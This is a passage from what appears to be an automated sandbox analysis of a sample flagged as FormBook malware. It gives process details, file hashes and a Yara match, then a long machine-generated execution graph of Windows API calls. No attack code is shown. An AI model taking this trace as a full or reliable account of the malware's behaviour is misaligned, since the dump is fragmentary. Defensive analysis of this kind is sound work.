                                                Commandline:"C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe"
                                                Imagebase:0x750000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2535533484.0000000005400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:15
                                                Start time:05:40:42
                                                Start date:13/12/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff613480000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:3.7%
                                                  Dynamic/Decrypted Code Coverage:1.5%
                                                  Signature Coverage:6.8%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:65
104950->105763 104952 c344a4 104953 c344c9 104952->104953 104954 bc9ea0 342 API calls 104952->104954 104956 c344cd 104953->104956 105788 bc9a98 59 API calls Mailbox 104953->105788 104954->104953 104956->104765 104957->104761 104958->104763 105149 bc4bb5 104959->105149 104964 bc4e08 LoadLibraryExW 105159 bc4b6a 104964->105159 104965 bfd8e6 104966 bc4e4a 84 API calls 104965->104966 104968 bfd8ed 104966->104968 104970 bc4b6a 3 API calls 104968->104970 104972 bfd8f5 104970->104972 105185 bc4f0b 104972->105185 104973 bc4e2f 104973->104972 104974 bc4e3b 104973->104974 104976 bc4e4a 84 API calls 104974->104976 104977 bc4e40 104976->104977 104977->104873 104977->104874 104980 bfd91c 105193 bc4ec7 104980->105193 104984 bc7667 59 API calls 104983->104984 104985 bc45b1 104984->104985 104986 bc7667 59 API calls 104985->104986 104987 bc45b9 104986->104987 104988 bc7667 59 API calls 104987->104988 104989 bc45c1 104988->104989 104990 bc7667 59 API calls 104989->104990 104991 bc45c9 104990->104991 104992 bc45fd 104991->104992 104993 bfd4d2 104991->104993 104994 bc784b 59 API calls 104992->104994 104995 bc8047 59 API calls 104993->104995 104996 bc460b 104994->104996 104997 bfd4db 104995->104997 104998 bc7d2c 59 API calls 104996->104998 104999 bc7d8c 59 API calls 104997->104999 105000 bc4615 104998->105000 105002 bc4640 104999->105002 105001 bc784b 59 API calls 105000->105001 105000->105002 105004 bc4636 105001->105004 105005 bc465f 105002->105005 105014 bfd4fb 105002->105014 105020 bc4680 105002->105020 105003 bc784b 59 API calls 105009 bc4691 105003->105009 105006 bc7d2c 59 API calls 105004->105006 105008 bc79f2 59 API calls 105005->105008 105006->105002 105007 bfd5cb 105010 bc7bcc 59 API calls 105007->105010 105011 bc4669 105008->105011 105012 bc46a3 105009->105012 105015 bc8047 59 API calls 105009->105015 105029 bfd588 105010->105029 105019 bc784b 59 API calls 105011->105019 105011->105020 105013 bc46b3 105012->105013 105016 bc8047 59 API calls 105012->105016 105018 bc46ba 
105013->105018 105021 bc8047 59 API calls 105013->105021 105014->105007 105017 bfd5b4 105014->105017 105027 bfd532 105014->105027 105015->105012 105016->105013 105017->105007 105023 bfd59f 105017->105023 105022 bc8047 59 API calls 105018->105022 105031 bc46c1 Mailbox 105018->105031 105019->105020 105020->105003 105021->105018 105022->105031 105026 bc7bcc 59 API calls 105023->105026 105024 bfd590 105025 bc7bcc 59 API calls 105024->105025 105025->105029 105026->105029 105027->105024 105032 bfd57b 105027->105032 105028 bc79f2 59 API calls 105028->105029 105029->105020 105029->105028 105444 bc7924 59 API calls 2 library calls 105029->105444 105031->104904 105033 bc7bcc 59 API calls 105032->105033 105033->105029 105035 bc7e4f 59 API calls 105034->105035 105036 bc79fd 105035->105036 105036->104911 105036->104913 105038 c2408d 105037->105038 105039 c24092 105038->105039 105040 c240a0 105038->105040 105041 bc8047 59 API calls 105039->105041 105042 bc7667 59 API calls 105040->105042 105043 c2409b Mailbox 105041->105043 105044 c240a8 105042->105044 105043->104928 105045 bc7667 59 API calls 105044->105045 105046 c240b0 105045->105046 105047 bc7667 59 API calls 105046->105047 105048 c240bb 105047->105048 105049 bc7667 59 API calls 105048->105049 105050 c240c3 105049->105050 105051 bc7667 59 API calls 105050->105051 105052 c240cb 105051->105052 105053 bc7667 59 API calls 105052->105053 105054 c240d3 105053->105054 105055 bc7667 59 API calls 105054->105055 105056 c240db 105055->105056 105057 bc7667 59 API calls 105056->105057 105058 c240e3 105057->105058 105059 bc459b 59 API calls 105058->105059 105060 c240fa 105059->105060 105061 bc459b 59 API calls 105060->105061 105062 c24113 105061->105062 105063 bc79f2 59 API calls 105062->105063 105064 c2411f 105063->105064 105065 c24132 105064->105065 105066 bc7d2c 59 API calls 105064->105066 105067 bc79f2 59 API calls 105065->105067 105066->105065 105068 c2413b 105067->105068 105069 c2414b 105068->105069 105070 bc7d2c 59 API calls 
105068->105070 105071 bc8047 59 API calls 105069->105071 105070->105069 105072 c24157 105071->105072 105073 bc7b2e 59 API calls 105072->105073 105074 c24163 105073->105074 105445 c24223 59 API calls 105074->105445 105076 c24172 105446 c24223 59 API calls 105076->105446 105078 c24185 105079 bc79f2 59 API calls 105078->105079 105080 c2418f 105079->105080 105081 c241a6 105080->105081 105082 c24194 105080->105082 105084 bc79f2 59 API calls 105081->105084 105083 bc7cab 59 API calls 105082->105083 105085 c241a1 105083->105085 105086 c241af 105084->105086 105089 bc7b2e 59 API calls 105085->105089 105087 c241cd 105086->105087 105088 bc7cab 59 API calls 105086->105088 105090 bc7b2e 59 API calls 105087->105090 105088->105085 105089->105087 105090->105043 105092 c29162 __ftell_nolock 105091->105092 105093 be0db6 Mailbox 59 API calls 105092->105093 105094 c291bf 105093->105094 105095 bc522e 59 API calls 105094->105095 105096 c291c9 105095->105096 105097 c28f5f GetSystemTimeAsFileTime 105096->105097 105098 c291d4 105097->105098 105099 bc4ee5 85 API calls 105098->105099 105100 c291e7 _wcscmp 105099->105100 105101 c2920b 105100->105101 105102 c292b8 105100->105102 105477 c29734 105101->105477 105104 c29734 96 API calls 105102->105104 105119 c29284 _wcscat 105104->105119 105107 bc4f0b 74 API calls 105109 c292dd 105107->105109 105108 c292c1 105108->104935 105110 bc4f0b 74 API calls 105109->105110 105112 c292ed 105110->105112 105111 c29239 _wcscat _wcscpy 105484 be40fb 58 API calls __wsplitpath_helper 105111->105484 105113 bc4f0b 74 API calls 105112->105113 105115 c29308 105113->105115 105116 bc4f0b 74 API calls 105115->105116 105117 c29318 105116->105117 105118 bc4f0b 74 API calls 105117->105118 105120 c29333 105118->105120 105119->105107 105119->105108 105121 bc4f0b 74 API calls 105120->105121 105122 c29343 105121->105122 105123 bc4f0b 74 API calls 105122->105123 105124 c29353 105123->105124 105125 bc4f0b 74 API calls 105124->105125 105126 c29363 105125->105126 105447 c298e3 
GetTempPathW GetTempFileNameW 105126->105447 105128 c2936f 105129 be525b 115 API calls 105128->105129 105136 c29380 105129->105136 105131 c29445 105133 c2944b DeleteFileW 105131->105133 105134 c2945f 105131->105134 105132 bc4f0b 74 API calls 105132->105136 105133->105108 105135 c29505 CopyFileW 105134->105135 105140 c29469 _wcsncpy 105134->105140 105137 c2951b DeleteFileW 105135->105137 105138 c2952d DeleteFileW 105135->105138 105136->105108 105136->105132 105144 c2943a 105136->105144 105448 be4863 105136->105448 105137->105108 105474 c298a2 CreateFileW 105138->105474 105485 c28b06 116 API calls __fcloseall 105140->105485 105143 c294f0 105143->105138 105145 c294f4 DeleteFileW 105143->105145 105461 be53a6 105144->105461 105145->105108 105146->104861 105147->104897 105148->104910 105198 bc4c03 105149->105198 105152 bc4bec FreeLibrary 105153 bc4bf5 105152->105153 105156 be525b 105153->105156 105154 bc4c03 2 API calls 105155 bc4bdc 105154->105155 105155->105152 105155->105153 105202 be5270 105156->105202 105158 bc4dfc 105158->104964 105158->104965 105362 bc4c36 105159->105362 105162 bc4c36 2 API calls 105165 bc4b8f 105162->105165 105163 bc4baa 105166 bc4c70 105163->105166 105164 bc4ba1 FreeLibrary 105164->105163 105165->105163 105165->105164 105167 be0db6 Mailbox 59 API calls 105166->105167 105168 bc4c85 105167->105168 105169 bc522e 59 API calls 105168->105169 105170 bc4c91 _memmove 105169->105170 105171 bc4ccc 105170->105171 105172 bc4d89 105170->105172 105173 bc4dc1 105170->105173 105174 bc4ec7 69 API calls 105171->105174 105366 bc4e89 CreateStreamOnHGlobal 105172->105366 105377 c2991b 95 API calls 105173->105377 105178 bc4cd5 105174->105178 105177 bc4f0b 74 API calls 105177->105178 105178->105177 105179 bc4d69 105178->105179 105181 bfd8a7 105178->105181 105372 bc4ee5 105178->105372 105179->104973 105182 bc4ee5 85 API calls 105181->105182 105183 bfd8bb 105182->105183 105184 bc4f0b 74 API calls 105183->105184 105184->105179 105186 bc4f1d 105185->105186 105187 bfd9cd 
105185->105187 105401 be55e2 105186->105401 105190 c29109 105421 c28f5f 105190->105421 105192 c2911f 105192->104980 105194 bc4ed6 105193->105194 105195 bfd990 105193->105195 105426 be5c60 105194->105426 105197 bc4ede 105199 bc4bd0 105198->105199 105200 bc4c0c LoadLibraryA 105198->105200 105199->105154 105199->105155 105200->105199 105201 bc4c1d GetProcAddress 105200->105201 105201->105199 105205 be527c __lseeki64 105202->105205 105203 be528f 105251 be8b28 58 API calls __getptd_noexit 105203->105251 105205->105203 105207 be52c0 105205->105207 105206 be5294 105252 be8db6 9 API calls __wcsnicmp_l 105206->105252 105221 bf04e8 105207->105221 105210 be52c5 105211 be52ce 105210->105211 105212 be52db 105210->105212 105253 be8b28 58 API calls __getptd_noexit 105211->105253 105214 be5305 105212->105214 105215 be52e5 105212->105215 105236 bf0607 105214->105236 105254 be8b28 58 API calls __getptd_noexit 105215->105254 105217 be529f __lseeki64 @_EH4_CallFilterFunc@8 105217->105158 105222 bf04f4 __lseeki64 105221->105222 105223 be9c0b __lock 58 API calls 105222->105223 105234 bf0502 105223->105234 105224 bf0576 105256 bf05fe 105224->105256 105225 bf057d 105261 be881d 58 API calls 2 library calls 105225->105261 105228 bf0584 105228->105224 105262 be9e2b InitializeCriticalSectionAndSpinCount 105228->105262 105229 bf05f3 __lseeki64 105229->105210 105231 be9c93 __mtinitlocknum 58 API calls 105231->105234 105233 bf05aa EnterCriticalSection 105233->105224 105234->105224 105234->105225 105234->105231 105259 be6c50 59 API calls __lock 105234->105259 105260 be6cba LeaveCriticalSection LeaveCriticalSection _doexit 105234->105260 105245 bf0627 __wopenfile 105236->105245 105237 bf0641 105267 be8b28 58 API calls __getptd_noexit 105237->105267 105238 bf07fc 105238->105237 105242 bf085f 105238->105242 105240 bf0646 105268 be8db6 9 API calls __wcsnicmp_l 105240->105268 105264 bf85a1 105242->105264 105243 be5310 105255 be5332 LeaveCriticalSection LeaveCriticalSection _fprintf 105243->105255 
105245->105237 105245->105238 105269 be37cb 60 API calls __wcsnicmp_l 105245->105269 105247 bf07f5 105247->105238 105270 be37cb 60 API calls __wcsnicmp_l 105247->105270 105249 bf0814 105249->105238 105271 be37cb 60 API calls __wcsnicmp_l 105249->105271 105251->105206 105252->105217 105253->105217 105254->105217 105255->105217 105263 be9d75 LeaveCriticalSection 105256->105263 105258 bf0605 105258->105229 105259->105234 105260->105234 105261->105228 105262->105233 105263->105258 105272 bf7d85 105264->105272 105266 bf85ba 105266->105243 105267->105240 105268->105243 105269->105247 105270->105249 105271->105238 105275 bf7d91 __lseeki64 105272->105275 105273 bf7da7 105359 be8b28 58 API calls __getptd_noexit 105273->105359 105275->105273 105277 bf7ddd 105275->105277 105276 bf7dac 105360 be8db6 9 API calls __wcsnicmp_l 105276->105360 105283 bf7e4e 105277->105283 105280 bf7df9 105361 bf7e22 LeaveCriticalSection __unlock_fhandle 105280->105361 105282 bf7db6 __lseeki64 105282->105266 105284 bf7e6e 105283->105284 105285 be44ea __wsopen_nolock 58 API calls 105284->105285 105289 bf7e8a 105285->105289 105286 bf7fc1 105287 be8dc6 __invoke_watson 8 API calls 105286->105287 105288 bf85a0 105287->105288 105291 bf7d85 __wsopen_helper 103 API calls 105288->105291 105289->105286 105290 bf7ec4 105289->105290 105297 bf7ee7 105289->105297 105292 be8af4 __lseeki64 58 API calls 105290->105292 105293 bf85ba 105291->105293 105294 bf7ec9 105292->105294 105293->105280 105295 be8b28 __wcsnicmp_l 58 API calls 105294->105295 105296 bf7ed6 105295->105296 105299 be8db6 __wcsnicmp_l 9 API calls 105296->105299 105298 bf7fa5 105297->105298 105305 bf7f83 105297->105305 105300 be8af4 __lseeki64 58 API calls 105298->105300 105301 bf7ee0 105299->105301 105302 bf7faa 105300->105302 105301->105280 105303 be8b28 __wcsnicmp_l 58 API calls 105302->105303 105304 bf7fb7 105303->105304 105306 be8db6 __wcsnicmp_l 9 API calls 105304->105306 105307 bed294 __alloc_osfhnd 61 API calls 105305->105307 105306->105286 
105308 bf8051 105307->105308 105309 bf807e 105308->105309 105310 bf805b 105308->105310 105311 bf7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105309->105311 105312 be8af4 __lseeki64 58 API calls 105310->105312 105321 bf80a0 105311->105321 105313 bf8060 105312->105313 105315 be8b28 __wcsnicmp_l 58 API calls 105313->105315 105314 bf811e GetFileType 105318 bf816b 105314->105318 105319 bf8129 GetLastError 105314->105319 105317 bf806a 105315->105317 105316 bf80ec GetLastError 105322 be8b07 __dosmaperr 58 API calls 105316->105322 105323 be8b28 __wcsnicmp_l 58 API calls 105317->105323 105329 bed52a __set_osfhnd 59 API calls 105318->105329 105320 be8b07 __dosmaperr 58 API calls 105319->105320 105324 bf8150 CloseHandle 105320->105324 105321->105314 105321->105316 105325 bf7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105321->105325 105326 bf8111 105322->105326 105323->105301 105324->105326 105327 bf815e 105324->105327 105328 bf80e1 105325->105328 105332 be8b28 __wcsnicmp_l 58 API calls 105326->105332 105330 be8b28 __wcsnicmp_l 58 API calls 105327->105330 105328->105314 105328->105316 105331 bf8189 105329->105331 105333 bf8163 105330->105333 105334 bf8344 105331->105334 105335 bf18c1 __lseeki64_nolock 60 API calls 105331->105335 105350 bf820a 105331->105350 105332->105286 105333->105326 105334->105286 105337 bf8517 CloseHandle 105334->105337 105336 bf81f3 105335->105336 105340 be8af4 __lseeki64 58 API calls 105336->105340 105355 bf8212 105336->105355 105338 bf7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105337->105338 105339 bf853e 105338->105339 105342 bf83ce 105339->105342 105343 bf8546 GetLastError 105339->105343 105340->105350 105341 bf0e5b 70 API calls __read_nolock 105341->105355 105342->105286 105344 be8b07 __dosmaperr 58 API calls 105343->105344 105345 bf8552 105344->105345 105347 bed43d __free_osfhnd 59 API calls 105345->105347 105346 bf0add __close_nolock 61 API calls 105346->105355 105347->105342 105348 bf97a2 
__chsize_nolock 82 API calls 105348->105355 105349 bed886 __write 78 API calls 105349->105350 105350->105334 105350->105349 105352 bf18c1 60 API calls __lseeki64_nolock 105350->105352 105350->105355 105351 bf83c1 105354 bf0add __close_nolock 61 API calls 105351->105354 105352->105350 105353 bf83aa 105353->105334 105357 bf83c8 105354->105357 105355->105341 105355->105346 105355->105348 105355->105350 105355->105351 105355->105353 105356 bf18c1 60 API calls __lseeki64_nolock 105355->105356 105356->105355 105358 be8b28 __wcsnicmp_l 58 API calls 105357->105358 105358->105342 105359->105276 105360->105282 105361->105282 105363 bc4b83 105362->105363 105364 bc4c3f LoadLibraryA 105362->105364 105363->105162 105363->105165 105364->105363 105365 bc4c50 GetProcAddress 105364->105365 105365->105363 105367 bc4ea3 FindResourceExW 105366->105367 105371 bc4ec0 105366->105371 105368 bfd933 LoadResource 105367->105368 105367->105371 105369 bfd948 SizeofResource 105368->105369 105368->105371 105370 bfd95c LockResource 105369->105370 105369->105371 105370->105371 105371->105171 105373 bfd9ab 105372->105373 105374 bc4ef4 105372->105374 105378 be584d 105374->105378 105376 bc4f02 105376->105178 105377->105171 105380 be5859 __lseeki64 105378->105380 105379 be586b 105391 be8b28 58 API calls __getptd_noexit 105379->105391 105380->105379 105381 be5891 105380->105381 105393 be6c11 105381->105393 105384 be5870 105392 be8db6 9 API calls __wcsnicmp_l 105384->105392 105388 be58a6 105400 be58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 105388->105400 105390 be587b __lseeki64 105390->105376 105391->105384 105392->105390 105394 be6c43 EnterCriticalSection 105393->105394 105395 be6c21 105393->105395 105397 be5897 105394->105397 105395->105394 105396 be6c29 105395->105396 105398 be9c0b __lock 58 API calls 105396->105398 105399 be57be 83 API calls 5 library calls 105397->105399 105398->105397 105399->105388 105400->105390 105404 be55fd 105401->105404 105403 bc4f2e 105403->105190 105405 be5609 
__lseeki64 105404->105405 105406 be561f _memset 105405->105406 105407 be564c 105405->105407 105409 be5644 __lseeki64 105405->105409 105417 be8b28 58 API calls __getptd_noexit 105406->105417 105408 be6c11 __lock_file 59 API calls 105407->105408 105410 be5652 105408->105410 105409->105403 105419 be541d 72 API calls 6 library calls 105410->105419 105413 be5639 105418 be8db6 9 API calls __wcsnicmp_l 105413->105418 105414 be5668 105420 be5686 LeaveCriticalSection LeaveCriticalSection _fprintf 105414->105420 105417->105413 105418->105409 105419->105414 105420->105409 105424 be520a GetSystemTimeAsFileTime 105421->105424 105423 c28f6e 105423->105192 105425 be5238 __aulldiv 105424->105425 105425->105423 105427 be5c6c __lseeki64 105426->105427 105428 be5c7e 105427->105428 105429 be5c93 105427->105429 105440 be8b28 58 API calls __getptd_noexit 105428->105440 105431 be6c11 __lock_file 59 API calls 105429->105431 105433 be5c99 105431->105433 105432 be5c83 105441 be8db6 9 API calls __wcsnicmp_l 105432->105441 105442 be58d0 67 API calls 6 library calls 105433->105442 105436 be5ca4 105443 be5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 105436->105443 105438 be5cb6 105439 be5c8e __lseeki64 105438->105439 105439->105197 105440->105432 105441->105439 105442->105436 105443->105438 105444->105029 105445->105076 105446->105078 105447->105128 105449 be486f __lseeki64 105448->105449 105450 be488d 105449->105450 105451 be48a5 105449->105451 105453 be489d __lseeki64 105449->105453 105498 be8b28 58 API calls __getptd_noexit 105450->105498 105454 be6c11 __lock_file 59 API calls 105451->105454 105453->105136 105456 be48ab 105454->105456 105455 be4892 105499 be8db6 9 API calls __wcsnicmp_l 105455->105499 105486 be470a 105456->105486 105462 be53b2 __lseeki64 105461->105462 105463 be53de 105462->105463 105464 be53c6 105462->105464 105467 be6c11 __lock_file 59 API calls 105463->105467 105470 be53d6 __lseeki64 105463->105470 105681 be8b28 58 API calls __getptd_noexit 105464->105681 105466 
be53cb 105682 be8db6 9 API calls __wcsnicmp_l 105466->105682 105469 be53f0 105467->105469 105665 be533a 105469->105665 105470->105131 105475 c298c8 SetFileTime CloseHandle 105474->105475 105476 c298de 105474->105476 105475->105476 105476->105108 105479 c29748 __tzset_nolock _wcscmp 105477->105479 105478 c29109 GetSystemTimeAsFileTime 105478->105479 105479->105478 105480 bc4f0b 74 API calls 105479->105480 105481 c29210 105479->105481 105482 bc4ee5 85 API calls 105479->105482 105480->105479 105481->105108 105483 be40fb 58 API calls __wsplitpath_helper 105481->105483 105482->105479 105483->105111 105484->105119 105485->105143 105489 be4719 105486->105489 105492 be4737 105486->105492 105487 be4727 105536 be8b28 58 API calls __getptd_noexit 105487->105536 105489->105487 105489->105492 105496 be4751 _memmove 105489->105496 105490 be472c 105537 be8db6 9 API calls __wcsnicmp_l 105490->105537 105500 be48dd LeaveCriticalSection LeaveCriticalSection _fprintf 105492->105500 105496->105492 105501 be46e6 105496->105501 105508 bed886 105496->105508 105538 be4a3d 105496->105538 105544 beae1e 78 API calls 7 library calls 105496->105544 105498->105455 105499->105453 105500->105453 105502 be4705 105501->105502 105503 be46f0 105501->105503 105502->105496 105545 be8b28 58 API calls __getptd_noexit 105503->105545 105505 be46f5 105546 be8db6 9 API calls __wcsnicmp_l 105505->105546 105509 bed892 __lseeki64 105508->105509 105510 bed89f 105509->105510 105511 bed8b6 105509->105511 105620 be8af4 58 API calls __getptd_noexit 105510->105620 105513 bed955 105511->105513 105516 bed8ca 105511->105516 105626 be8af4 58 API calls __getptd_noexit 105513->105626 105515 bed8a4 105519 bed8e8 105516->105519 105520 bed8f2 105516->105520 105536->105490 105537->105492 105539 be4a50 105538->105539 105543 be4a74 105538->105543 105540 be46e6 __output_l 58 API calls 105539->105540 105539->105543 105541 be4a6d 105540->105541 105542 bed886 __write 78 API calls 105541->105542 105542->105543 105543->105496 
105544->105496 105545->105505 105620->105515 105666 be5349 105665->105666 105669 be535d 105665->105669 105714 be8b28 58 API calls __getptd_noexit 105666->105714 105668 be5359 105683 be5415 LeaveCriticalSection LeaveCriticalSection _fprintf 105668->105683 105669->105668 105670 be4a3d __flush 78 API calls 105669->105670 105672 be5369 105670->105672 105671 be534e 105715 be8db6 9 API calls __wcsnicmp_l 105671->105715 105684 bf0b77 105672->105684 105676 be46e6 __output_l 58 API calls 105681->105466 105682->105470 105683->105470 105685 be5371 105684->105685 105686 bf0b84 105684->105686 105685->105676 105686->105685 105687 be2d55 _free 58 API calls 105686->105687 105687->105685 105714->105671 105715->105668 105760 c23c3e 105759->105760 105761 c24475 FindFirstFileW 105759->105761 105760->104765 105761->105760 105762 c2448a FindClose 105761->105762 105762->105760 105789 bc7a16 105763->105789 105765 bc646a 105796 bc750f 105765->105796 105767 bc6484 Mailbox 105767->104952 105770 bfdff6 105806 c1f8aa 92 API calls 4 library calls 105770->105806 105771 bc750f 59 API calls 105781 bc6265 105771->105781 105775 bc7d8c 59 API calls 105775->105781 105776 bfe004 105777 bc750f 59 API calls 105776->105777 105779 bfe01a 105777->105779 105778 bc6799 _memmove 105807 c1f8aa 92 API calls 4 library calls 105778->105807 105779->105767 105780 bfdf92 105782 bc8029 59 API calls 105780->105782 105781->105765 105781->105770 105781->105771 105781->105775 105781->105778 105781->105780 105785 bc7e4f 59 API calls 105781->105785 105794 bc5f6c 60 API calls 105781->105794 105795 bc5d41 59 API calls Mailbox 105781->105795 105804 bc5e72 60 API calls 105781->105804 105805 bc7924 59 API calls 2 library calls 105781->105805 105784 bfdf9d 105782->105784 105787 be0db6 Mailbox 59 API calls 105784->105787 105786 bc643b CharUpperBuffW 105785->105786 105786->105781 105787->105778 105788->104956 105790 be0db6 Mailbox 59 API calls 105789->105790 105791 bc7a3b 105790->105791 105792 bc8029 59 API calls 105791->105792 
105793 bc7a4a 105792->105793 105793->105781 105794->105781 105795->105781 105797 bc75af 105796->105797 105801 bc7522 _memmove 105796->105801 105799 be0db6 Mailbox 59 API calls 105797->105799 105798 be0db6 Mailbox 59 API calls 105800 bc7529 105798->105800 105799->105801 105802 bc7552 105800->105802 105803 be0db6 Mailbox 59 API calls 105800->105803 105801->105798 105802->105767 105803->105802 105804->105781 105805->105781 105806->105776 105807->105767 105809 bc818f 105808->105809 105812 bc81aa 105808->105812 105810 bc7e4f 59 API calls 105809->105810 105811 bc8197 CharUpperBuffW 105810->105811 105811->105812 105812->104775 105814 bcf251 105813->105814 105815 bcf272 105814->105815 105941 c29e4a 90 API calls 4 library calls 105814->105941 105815->104815 105818 bc838d 105817->105818 105819 bfedbd 105817->105819 105820 be0db6 Mailbox 59 API calls 105818->105820 105821 bc8394 105820->105821 105822 bc83b5 105821->105822 105942 bc8634 59 API calls Mailbox 105821->105942 105822->104793 105822->104803 105825 c04cc3 105824->105825 105836 bd09f5 105824->105836 105983 c29e4a 90 API calls 4 library calls 105825->105983 105827 bd0cfa 105827->104823 105829 bd0ee4 105829->105827 105831 bd0ef1 105829->105831 105981 bd1093 342 API calls Mailbox 105831->105981 105832 bd0a4b PeekMessageW 105899 bd0a05 Mailbox 105832->105899 105834 bd0ef8 LockWindowUpdate DestroyWindow GetMessageW 105834->105827 105838 bd0f2a 105834->105838 105836->105899 105984 bc9e5d 60 API calls 105836->105984 105985 c16349 342 API calls 105836->105985 105837 c04e81 Sleep 105837->105899 105841 c05c58 TranslateMessage DispatchMessageW GetMessageW 105838->105841 105839 bd0ce4 105839->105827 105980 bd1070 10 API calls Mailbox 105839->105980 105841->105841 105842 c05c88 105841->105842 105842->105827 105843 bd0ea5 TranslateMessage DispatchMessageW 105844 bd0e43 PeekMessageW 105843->105844 105844->105899 105845 c04d50 TranslateAcceleratorW 105845->105844 105845->105899 105846 bc9e5d 60 API calls 105846->105899 105847 bd0d13 
timeGetTime 105847->105899 105848 c0581f WaitForSingleObject 105852 c0583c GetExitCodeProcess CloseHandle 105848->105852 105848->105899 105850 bc8047 59 API calls 105850->105899 105851 bc7667 59 API calls 105885 bd0e70 Mailbox 105851->105885 105883 bd0f95 105852->105883 105853 bd0e5f Sleep 105853->105885 105854 be0db6 59 API calls Mailbox 105854->105899 105855 c05af8 Sleep 105855->105885 105858 be049f timeGetTime 105858->105885 105859 bd0f4e timeGetTime 105982 bc9e5d 60 API calls 105859->105982 105862 c05b8f GetExitCodeProcess 105867 c05ba5 WaitForSingleObject 105862->105867 105868 c05bbb CloseHandle 105862->105868 105863 bc9837 85 API calls 105863->105899 105865 c45f25 111 API calls 105865->105885 105866 bcb7dd 110 API calls 105866->105885 105867->105868 105867->105899 105868->105885 105870 c05874 105870->105883 105871 c05078 Sleep 105871->105899 105872 c05c17 Sleep 105872->105899 105875 bc7de1 59 API calls 105875->105885 105878 bc9ea0 315 API calls 105878->105899 105880 bcf460 315 API calls 105880->105899 105881 bcfce0 315 API calls 105881->105899 105883->104823 105885->105851 105885->105858 105885->105862 105885->105865 105885->105866 105885->105870 105885->105871 105885->105872 105885->105875 105885->105883 105885->105899 105991 c22408 60 API calls 105885->105991 105992 bc9e5d 60 API calls 105885->105992 105993 bc89b3 69 API calls Mailbox 105885->105993 105994 bcb73c 342 API calls 105885->105994 105995 c164da 60 API calls 105885->105995 105996 c25244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105885->105996 105997 c23c55 66 API calls Mailbox 105885->105997 105886 bc84c0 69 API calls 105886->105899 105888 c29e4a 90 API calls 105888->105899 105889 bc9c90 59 API calls Mailbox 105889->105899 105890 c1617e 59 API calls Mailbox 105890->105899 105891 bc82df 59 API calls 105891->105899 105892 bc7de1 59 API calls 105892->105899 105893 bc89b3 69 API calls 105893->105899 105894 c055d5 VariantClear 105894->105899 105895 c16e8f 59 
API calls 105895->105899 105896 c0566b VariantClear 105896->105899 105897 c05419 VariantClear 105897->105899 105898 bc8cd4 59 API calls Mailbox 105898->105899 105899->105832 105899->105837 105899->105839 105899->105843 105899->105844 105899->105845 105899->105846 105899->105847 105899->105848 105899->105850 105899->105853 105899->105854 105899->105855 105899->105859 105899->105863 105899->105878 105899->105880 105899->105881 105899->105883 105899->105885 105899->105886 105899->105888 105899->105889 105899->105890 105899->105891 105899->105892 105899->105893 105899->105894 105899->105895 105899->105896 105899->105897 105899->105898 105900 bcb73c 315 API calls 105899->105900 105943 bce6a0 105899->105943 105974 bc31ce 105899->105974 105979 bce420 342 API calls 105899->105979 105986 c46018 59 API calls 105899->105986 105987 c29a15 59 API calls Mailbox 105899->105987 105988 c1d4f2 59 API calls 105899->105988 105989 c160ef 59 API calls 2 library calls 105899->105989 105990 bc8401 59 API calls 105899->105990 105900->105899 105902 bfeda1 105901->105902 105905 bc82f2 105901->105905 105903 bfedb1 105902->105903 106006 c161a4 59 API calls 105902->106006 105906 bc831c 105905->105906 105907 bc85c0 59 API calls 105905->105907 105911 bc8339 Mailbox 105905->105911 105908 bc8322 105906->105908 105909 bc85c0 59 API calls 105906->105909 105907->105906 105910 bc9c90 Mailbox 59 API calls 105908->105910 105908->105911 105909->105908 105910->105911 105911->104832 105912->104829 105913->104829 105914->104777 105915->104837 105916->104786 105917->104837 105918->104837 105919->104789 105920->104798 105921->104799 105922->104799 105924 bc85ce 105923->105924 105930 bc85f6 105923->105930 105925 bc85dc 105924->105925 105927 bc85c0 59 API calls 105924->105927 105926 bc85e2 105925->105926 105928 bc85c0 59 API calls 105925->105928 105929 bc9c90 Mailbox 59 API calls 105926->105929 105926->105930 105927->105925 105928->105926 105929->105930 105930->104802 105931->104829 105932->104829 105933->104829 
105935 bc84cb 105934->105935 105937 bc84f2 105935->105937 106007 bc89b3 69 API calls Mailbox 105935->106007 105937->104828 105938->104837 105939->104819 105940->104837 105941->105815 105942->105822 105944 bce6d5 105943->105944 105945 c03aa9 105944->105945 105948 bce73f 105944->105948 105957 bce799 105944->105957 105946 bc9ea0 342 API calls 105945->105946 105947 c03abe 105946->105947 105962 bce970 Mailbox 105947->105962 105999 c29e4a 90 API calls 4 library calls 105947->105999 105951 bc7667 59 API calls 105948->105951 105948->105957 105949 bc7667 59 API calls 105949->105957 105952 c03b04 105951->105952 105954 be2d40 __cinit 67 API calls 105952->105954 105953 be2d40 __cinit 67 API calls 105953->105957 105954->105957 105955 c03b26 105955->105899 105956 bc84c0 69 API calls 105956->105962 105957->105949 105957->105953 105957->105955 105959 bce95a 105957->105959 105957->105962 105958 bc9ea0 342 API calls 105958->105962 105959->105962 106000 c29e4a 90 API calls 4 library calls 105959->106000 105961 c29e4a 90 API calls 105961->105962 105962->105956 105962->105958 105962->105961 105963 bc8d40 59 API calls 105962->105963 105964 bc9c90 Mailbox 59 API calls 105962->105964 105968 bcf195 105962->105968 105973 bcea78 105962->105973 105998 bc7f77 59 API calls 2 library calls 